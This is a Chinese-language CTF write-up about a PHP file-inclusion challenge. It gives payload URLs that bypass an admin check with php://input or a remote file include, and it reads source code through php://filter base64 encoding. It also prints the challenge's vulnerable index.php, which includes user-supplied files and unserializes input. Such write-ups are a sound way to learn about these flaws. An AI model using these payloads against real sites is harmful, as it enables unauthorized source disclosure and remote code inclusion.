Paste_Image.png
没什么信息,因此ctrl+u查看源码:
Paste_Image.png
看到提示,file_get_contents()函数,联想到文件包含漏洞,因此google一波,查到
Paste_Image.png
查看原文
因此试一试:
Paste_Image.png
补充一种饶过方法:
由于本题:allow_url_include=On
因此可以包含一个远程文件,假设你的云服务IP地址为:xxx
则可以输入http://ctf1.shiyanbar.com/shian-du/?user=http://xxxx/a.txt
其中a.txt的内容为:the user is admin
接着使用文件包含查看index.php和class.php的源码
#url
http://ctf1.shiyanbar.com/shian-du/?user=php://input&file=php://filter/read=convert.base64-encode/resource=index.php
http://ctf1.shiyanbar.com/shian-du/?user=php://input&file=php://filter/read=convert.base64-encode/resource=class.php
#POST
the user is admin
用base64解码,得到
#index.php
$user = $_GET["user"];
$file = $_GET["file"];
$pass = $_GET["pass"];
if(isset($user)&&(file_get_contents($user,'r')==="the user is admin")){
echo "hello admin!
";
if(preg_match("/f1a9/",$file)){
exit();
}else{
include($file); //class.php
$pass = unserialize($pass);
echo $pass;
}
}else{
echo "you are not admin ! ";
}
?>